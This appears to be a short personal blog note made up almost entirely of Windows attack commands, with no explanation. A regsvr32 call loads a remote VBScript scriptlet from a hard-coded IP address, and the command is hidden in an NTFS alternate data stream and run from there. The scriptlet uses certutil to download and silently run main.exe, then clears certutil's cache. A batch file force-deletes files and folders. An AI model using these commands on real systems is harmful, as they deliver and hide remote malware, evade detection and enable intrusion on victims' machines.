XhstormR


On a dark desert highway Cool wind in my hair


Alternate Data Stream

Updated on 2019-09-30

regsvr32.exe /s /u /i:http://47.98.135.65/main/main.xml scrobj.dll
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:http://47.98.135.65/main/main.xml ^scrobj.dll > ...:payload.bat

cmd.exe - < ...:payload.bat

main.xml

<?xml version="1.0" encoding="UTF-8"?>
<scriptlet>
<registration classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="VBScript">
    <![CDATA[
        CreateObject("WScript.Shell").Run _
            "%ComSpec% /c cd /d %TEMP% && " &_
            "(IF NOT EXIST main.exe certutil.exe -urlcache -split -f http://47.98.135.65/main/main.exe) && " &_
            "certutil.exe -urlcache * delete & " &_
            "main.exe r", 0, false
    ]]>
</script>
</registration>
</scriptlet>

delete.bat

del /f /a /q \\?\%1
rd /s /q \\?\%1

Reference

TOP